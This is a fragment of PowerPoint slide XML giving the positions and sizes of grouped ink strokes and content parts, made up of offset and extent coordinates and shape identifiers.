                <a:ext cx="173520" cy="140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5E26AEA-F208-2442-B2A3-E27F56B056B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20913" y="4613152"/>
                  <a:ext cx="1911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B874C0C-32D1-0E4D-8135-42ACA5682CA8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1196313" y="4270792"/>
                <a:ext cx="87480" cy="501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B874C0C-32D1-0E4D-8135-42ACA5682CA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87313" y="4261792"/>
                  <a:ext cx="10512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2289440-D47F-5C47-A40C-C84FA70D8CA8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1335273" y="4322272"/>
                <a:ext cx="270720" cy="263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2289440-D47F-5C47-A40C-C84FA70D8CA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326273" y="4313632"/>
                  <a:ext cx="2883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8FF9F52-8385-724A-BA84-6872D2C4FC06}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1572153" y="4189072"/>
                <a:ext cx="208440" cy="741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8FF9F52-8385-724A-BA84-6872D2C4FC0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563513" y="4180432"/>
                  <a:ext cx="226080" cy="75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177A09B-2C01-2244-A4D8-D509B75E9F22}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1903713" y="4585432"/>
                <a:ext cx="120240" cy="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177A09B-2C01-2244-A4D8-D509B75E9F2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94713" y="4576432"/>
                  <a:ext cx="137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18FD271-D0DA-D94C-86A2-98EBE38271CD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1923513" y="4664992"/>
                <a:ext cx="158400" cy="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18FD271-D0DA-D94C-86A2-98EBE38271C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914873" y="4655992"/>
                  <a:ext cx="176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79A6960-E3D7-844F-BA67-FF79B4569FCF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2238153" y="4503352"/>
                <a:ext cx="292320" cy="335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79A6960-E3D7-844F-BA67-FF79B4569FC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229513" y="4494352"/>
                  <a:ext cx="309960" cy="35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8B8C10F-CA73-C343-A500-12630E61F68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3671313" y="1799752"/>
            <a:ext cx="2080440" cy="294480"/>
            <a:chOff x="3671313" y="1799752"/>
            <a:chExt cx="2080440" cy="29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37DF5DA-C2DB-384C-8A02-486F41F53EDF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3671313" y="1939792"/>
                <a:ext cx="812160" cy="14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37DF5DA-C2DB-384C-8A02-486F41F53ED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662313" y="1931152"/>
                  <a:ext cx="8298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FAD9478-AF48-5C49-8849-5A4E0051E80C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4290873" y="1874632"/>
                <a:ext cx="203040" cy="153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FAD9478-AF48-5C49-8849-5A4E0051E80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81873" y="1865992"/>
                  <a:ext cx="2206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9FE21CB-BD33-7846-842D-10A73A091678}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4710273" y="1799752"/>
                <a:ext cx="173520" cy="294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9FE21CB-BD33-7846-842D-10A73A09167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01633" y="1790752"/>
                  <a:ext cx="1911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E9A9E31-77FC-7347-8D9B-F232F9E8A9D2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5087913" y="1909552"/>
                <a:ext cx="616680" cy="30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E9A9E31-77FC-7347-8D9B-F232F9E8A9D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79273" y="1900552"/>
                  <a:ext cx="6343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E1CE0A0-7331-B246-8E8B-771115F541C0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5600913" y="1841512"/>
                <a:ext cx="150840" cy="181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E1CE0A0-7331-B246-8E8B-771115F541C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92273" y="1832512"/>
                  <a:ext cx="168480" cy="19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12D3DFA-893F-9940-8CBB-E008AA2024AD}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4448553" y="4330912"/>
              <a:ext cx="319680" cy="3657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12D3DFA-893F-9940-8CBB-E008AA2024A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439913" y="4321912"/>
                <a:ext cx="337320" cy="38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7E085AA2-64F5-8C46-99BB-98F9DD0FDC5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6328113" y="3482752"/>
            <a:ext cx="1434240" cy="705600"/>
            <a:chOff x="6328113" y="3482752"/>
            <a:chExt cx="1434240" cy="70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4AAB05D-7D4D-E547-A9E0-95C0201FEF15}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7367073" y="3581392"/>
                <a:ext cx="245160" cy="326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4AAB05D-7D4D-E547-A9E0-95C0201FEF1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358073" y="3572752"/>
                  <a:ext cx="26280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74D17E6-407C-E640-83B7-EB0C93EB0234}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7266633" y="3510472"/>
                <a:ext cx="128880" cy="4118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74D17E6-407C-E640-83B7-EB0C93EB023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257993" y="3501472"/>
                  <a:ext cx="14652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5076A14-F4FB-2542-B065-A1BF70F1D408}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7666953" y="3482752"/>
                <a:ext cx="95400" cy="519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5076A14-F4FB-2542-B065-A1BF70F1D40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657953" y="3474112"/>
                  <a:ext cx="11304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291A8CC-763B-774F-9E84-C7537A654E09}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6533673" y="3640792"/>
                <a:ext cx="360" cy="339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291A8CC-763B-774F-9E84-C7537A654E0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525033" y="3631792"/>
                  <a:ext cx="1800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6DEF450-18AE-3B49-BB1F-DA43D9B6747F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6328113" y="3629992"/>
                <a:ext cx="452880" cy="454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6DEF450-18AE-3B49-BB1F-DA43D9B6747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19113" y="3621352"/>
                  <a:ext cx="47052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3842A0E-9B82-C94D-8937-6E6E38905A67}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6432153" y="4084312"/>
                <a:ext cx="360" cy="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3842A0E-9B82-C94D-8937-6E6E38905A6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423153" y="407567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1D020E2-F746-7B43-8A14-7183AEADA73C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6868833" y="3980992"/>
                <a:ext cx="360" cy="1501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1D020E2-F746-7B43-8A14-7183AEADA73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860193" y="3971992"/>
                  <a:ext cx="180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8E48B95-A3EE-3941-A097-D6A32358181E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6860913" y="4013752"/>
                <a:ext cx="175320" cy="174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8E48B95-A3EE-3941-A097-D6A32358181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852273" y="4004752"/>
                  <a:ext cx="192960" cy="1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0ADCD95-46F4-4A47-A000-83D77440B3D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7876113" y="3348832"/>
            <a:ext cx="843120" cy="515160"/>
            <a:chOff x="7876113" y="3348832"/>
            <a:chExt cx="843120" cy="51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EAFF99A-D752-604B-9AB2-FC1BFAC4C5DB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7876113" y="3660952"/>
                <a:ext cx="179640" cy="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EAFF99A-D752-604B-9AB2-FC1BFAC4C5D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867113" y="3652312"/>
                  <a:ext cx="197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4A25497-710F-2749-ABB6-0D27FF0C5182}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7904193" y="3778312"/>
                <a:ext cx="231840" cy="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4A25497-710F-2749-ABB6-0D27FF0C518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895553" y="3769312"/>
                  <a:ext cx="249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DBF4EAA-7E03-A24D-8519-02A27E6DB510}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8322873" y="3348832"/>
                <a:ext cx="396360" cy="5151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DBF4EAA-7E03-A24D-8519-02A27E6DB51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313873" y="3340192"/>
                  <a:ext cx="414000" cy="53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32690947-CBF7-ED42-812F-0BF313E7A38F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="965553" y="6272752"/>
              <a:ext cx="360" cy="3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32690947-CBF7-ED42-812F-0BF313E7A38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56913" y="62637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8078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F0997-B26B-7F46-B433-96A289FB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1A836A-8BB9-F74C-B61F-B49E1EC31171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="398553" y="2436952"/>
            <a:ext cx="645120" cy="361440"/>
            <a:chOff x="398553" y="2436952"/>
            <a:chExt cx="645120" cy="36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45F780C-92D4-A34D-9D18-15B5710F979C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="398553" y="2436952"/>
                <a:ext cx="141120" cy="305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45F780C-92D4-A34D-9D18-15B5710F979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9553" y="2427952"/>
                  <a:ext cx="15876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D656CF6-A568-4A4D-9514-2A6B41A2991E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="399273" y="2633512"/>
                <a:ext cx="116280" cy="8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D656CF6-A568-4A4D-9514-2A6B41A299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0273" y="2624872"/>
                  <a:ext cx="1339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DD1CA66-FA83-684B-952B-4A58FB3901EB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="626793" y="2690752"/>
                <a:ext cx="360" cy="107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DD1CA66-FA83-684B-952B-4A58FB3901E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7793" y="2682112"/>
                  <a:ext cx="180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AE421B8-7CB2-404E-9C28-15610287DFB5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="621753" y="2664832"/>
                <a:ext cx="82080" cy="96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AE421B8-7CB2-404E-9C28-15610287DFB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3113" y="2655832"/>
                  <a:ext cx="997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F40A04C-4C2A-2848-B0BD-B6BD3F10177F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="741993" y="2666272"/>
                <a:ext cx="194040" cy="103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F40A04C-4C2A-2848-B0BD-B6BD3F10177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2993" y="2657632"/>
                  <a:ext cx="2116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C9A695D-EE19-5E46-8551-B1E297E9CCCE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="931353" y="2482312"/>
                <a:ext cx="24120" cy="269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C9A695D-EE19-5E46-8551-B1E297E9CCC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22713" y="2473312"/>
                  <a:ext cx="417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48CF5BD-56EC-FF44-99FD-D5690796179B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="920193" y="2621992"/>
                <a:ext cx="123480" cy="154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48CF5BD-56EC-FF44-99FD-D5690796179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11193" y="2613352"/>
                  <a:ext cx="141120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2844E97-5698-0148-A11F-138CFC54E28F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="487833" y="1698232"/>
            <a:ext cx="6581520" cy="411840"/>
            <a:chOff x="487833" y="1698232"/>
            <a:chExt cx="6581520" cy="41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D421EA9-342A-8248-A5DC-3281D3E3C30B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1277313" y="1905232"/>
                <a:ext cx="360" cy="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D421EA9-342A-8248-A5DC-3281D3E3C30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68313" y="189659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16CA5EC-EEE1-F446-ACD0-7A8E2414CC82}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="940353" y="1936912"/>
                <a:ext cx="36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16CA5EC-EEE1-F446-ACD0-7A8E2414CC8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31713" y="19279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2C52F3E-3A61-5F47-87E0-3F9C66E49AE4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="511953" y="1698232"/>
                <a:ext cx="307800" cy="411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2C52F3E-3A61-5F47-87E0-3F9C66E49AE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03313" y="1689232"/>
                  <a:ext cx="32544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F3654C1-6CDF-0F4F-B5FE-497C15C5E120}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="487833" y="2000272"/>
                <a:ext cx="22572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F3654C1-6CDF-0F4F-B5FE-497C15C5E12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79193" y="1991632"/>
                  <a:ext cx="243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5280F9F-BB47-4745-95E8-C8D0E38847C9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1046193" y="1774192"/>
                <a:ext cx="6023160" cy="230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5280F9F-BB47-4745-95E8-C8D0E38847C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37193" y="1765552"/>
                  <a:ext cx="6040800" cy="24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82EDCF-55CC-F549-A377-C15D8AE0D808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7734273" y="1835032"/>
            <a:ext cx="463680" cy="451440"/>
            <a:chOff x="7734273" y="1835032"/>
            <a:chExt cx="463680" cy="45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A1CE69E-E33E-9046-BB0F-397CA86C52EE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7858473" y="1841512"/>
                <a:ext cx="76680" cy="373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A1CE69E-E33E-9046-BB0F-397CA86C52E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49833" y="1832872"/>
                  <a:ext cx="9432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0E87D00-298C-E447-8CA8-1C8A9E8D576F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7734273" y="1835032"/>
                <a:ext cx="463680" cy="451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0E87D00-298C-E447-8CA8-1C8A9E8D576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725273" y="1826032"/>
                  <a:ext cx="481320" cy="46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88DB705-EDD3-E144-8F11-1092608FC721}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3890913" y="2075872"/>
              <a:ext cx="123840" cy="10998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88DB705-EDD3-E144-8F11-1092608FC72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882273" y="2066872"/>
                <a:ext cx="141480" cy="111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16A34054-6598-0A4C-BDCB-A2FD9F898B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886233" y="3496792"/>
            <a:ext cx="1120680" cy="892440"/>
            <a:chOff x="3886233" y="3496792"/>
            <a:chExt cx="1120680" cy="89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60F1E15-D09D-FB4C-829A-B2D52EF45A16}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3952113" y="3532072"/>
                <a:ext cx="28440" cy="361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60F1E15-D09D-FB4C-829A-B2D52EF45A1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943113" y="3523072"/>
                  <a:ext cx="4608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66B24B8-4205-8C42-8F98-D3F33DAB0C70}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3886233" y="3496792"/>
                <a:ext cx="326880" cy="118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66B24B8-4205-8C42-8F98-D3F33DAB0C7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77233" y="3487792"/>
                  <a:ext cx="3445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EF67694-CF2A-8047-86F3-4CEAEB1333EB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3962193" y="3708832"/>
                <a:ext cx="272880" cy="42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EF67694-CF2A-8047-86F3-4CEAEB1333E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193" y="3700192"/>
                  <a:ext cx="2905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7E8C227-6CDE-4A4E-AE05-A3734827F9E2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3942753" y="3929152"/>
                <a:ext cx="317520" cy="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7E8C227-6CDE-4A4E-AE05-A3734827F9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934113" y="3920152"/>
                  <a:ext cx="335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7467F4D-4C92-9D4C-9975-0C6BB4F385F6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4306713" y="4046872"/>
                <a:ext cx="148680" cy="203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7467F4D-4C92-9D4C-9975-0C6BB4F385F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297713" y="4037872"/>
                  <a:ext cx="1663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0920616-E98E-724B-998A-0482C8A755AD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4306353" y="4197352"/>
                <a:ext cx="66960" cy="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0920616-E98E-724B-998A-0482C8A755A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297353" y="4188712"/>
                  <a:ext cx="84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CDAC2E4-3B72-474E-A6BE-A19A1CF1A7B6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4599033" y="4213912"/>
                <a:ext cx="360" cy="175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CDAC2E4-3B72-474E-A6BE-A19A1CF1A7B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590033" y="4204912"/>
                  <a:ext cx="180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51B2590-B655-4D43-A0D4-F373A50AE7BF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4579593" y="4204552"/>
                <a:ext cx="105120" cy="108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51B2590-B655-4D43-A0D4-F373A50AE7B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570593" y="4195912"/>
                  <a:ext cx="1227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0D555D8-B3B0-2F4D-922B-D8FEC4948AE9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4738713" y="4198792"/>
                <a:ext cx="131760" cy="131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0D555D8-B3B0-2F4D-922B-D8FEC4948AE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29713" y="4190152"/>
                  <a:ext cx="1494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DCB1081-6A6F-8F46-BA1F-28C9BD6F61EF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4909353" y="4014832"/>
                <a:ext cx="16560" cy="259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DCB1081-6A6F-8F46-BA1F-28C9BD6F61E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900353" y="4006192"/>
                  <a:ext cx="342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CF6CAC7-4F38-B04A-A891-1D7CE9971FB1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4913673" y="4156672"/>
                <a:ext cx="93240" cy="1314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CF6CAC7-4F38-B04A-A891-1D7CE9971FB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904673" y="4148032"/>
                  <a:ext cx="110880" cy="14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BCFC836-6EBC-4D45-BACE-D52ED669AF08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="275793" y="3011512"/>
            <a:ext cx="1308600" cy="794520"/>
            <a:chOff x="275793" y="3011512"/>
            <a:chExt cx="1308600" cy="79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DB2D6B3-DFB9-C74C-AD03-345131D048A5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="412593" y="3100792"/>
                <a:ext cx="213120" cy="370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DB2D6B3-DFB9-C74C-AD03-345131D048A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03953" y="3091792"/>
                  <a:ext cx="23076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D61F108-BE60-EB43-B8C0-C2F02B69F69F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="434553" y="3365032"/>
                <a:ext cx="14328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D61F108-BE60-EB43-B8C0-C2F02B69F69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25913" y="3356392"/>
                  <a:ext cx="160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26B549E-9C83-0144-B348-4DCB0A36B698}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="727953" y="3447472"/>
                <a:ext cx="17280" cy="263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26B549E-9C83-0144-B348-4DCB0A36B69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18953" y="3438832"/>
                  <a:ext cx="349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79E187D-11D6-EE4B-AE55-E6BFACE3E719}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="702033" y="3423352"/>
                <a:ext cx="115200" cy="138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79E187D-11D6-EE4B-AE55-E6BFACE3E71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93033" y="3414352"/>
                  <a:ext cx="1328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8619AA6-9FA6-F44A-8D63-DC5D5212610B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="870513" y="3381592"/>
                <a:ext cx="57960" cy="114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8619AA6-9FA6-F44A-8D63-DC5D5212610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61513" y="3372592"/>
                  <a:ext cx="756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4648B8A-F25F-224C-8942-075454AA8032}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="985713" y="3397072"/>
                <a:ext cx="11880" cy="78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4648B8A-F25F-224C-8942-075454AA803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77073" y="3388072"/>
                  <a:ext cx="29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71DE177-BC5A-8643-90C8-D9B445B4A8FD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="946473" y="3322912"/>
                <a:ext cx="360" cy="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71DE177-BC5A-8643-90C8-D9B445B4A8F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37473" y="331427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4D928AA-1D46-984C-96B9-0038C46984EF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1060953" y="3367912"/>
                <a:ext cx="127440" cy="133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4D928AA-1D46-984C-96B9-0038C46984E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1953" y="3359272"/>
                  <a:ext cx="1450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870F310-EAA5-D349-BD13-332F2283A566}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="275793" y="3011512"/>
                <a:ext cx="1308600" cy="7945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870F310-EAA5-D349-BD13-332F2283A56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67153" y="3002872"/>
                  <a:ext cx="1326240" cy="81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6635847-49BF-0E46-92F7-CC5123D2A558}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7642113" y="3646912"/>
              <a:ext cx="310320" cy="3243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6635847-49BF-0E46-92F7-CC5123D2A55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633113" y="3638272"/>
                <a:ext cx="327960" cy="34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D03B5AE0-B816-7142-9E3A-4B1284554B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6494433" y="2689672"/>
            <a:ext cx="1798560" cy="1486080"/>
            <a:chOff x="6494433" y="2689672"/>
            <a:chExt cx="1798560" cy="148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3149EA-396D-864E-83EC-4D55E3F6EC2D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7570473" y="2689672"/>
                <a:ext cx="176040" cy="333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3149EA-396D-864E-83EC-4D55E3F6EC2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561833" y="2680672"/>
                  <a:ext cx="19368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0A566D9-5384-2944-8BB3-36A6C88B3AB9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7573353" y="2898472"/>
                <a:ext cx="82440" cy="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0A566D9-5384-2944-8BB3-36A6C88B3AB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564713" y="2889472"/>
                  <a:ext cx="100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BE8FD03-0A03-7848-B51F-1CECAB40B88E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7859553" y="3002872"/>
                <a:ext cx="23400" cy="1411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BE8FD03-0A03-7848-B51F-1CECAB40B88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850913" y="2993872"/>
                  <a:ext cx="410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A4E582A-7EF3-CA45-BB56-98AF61FC8F9B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7837953" y="2902792"/>
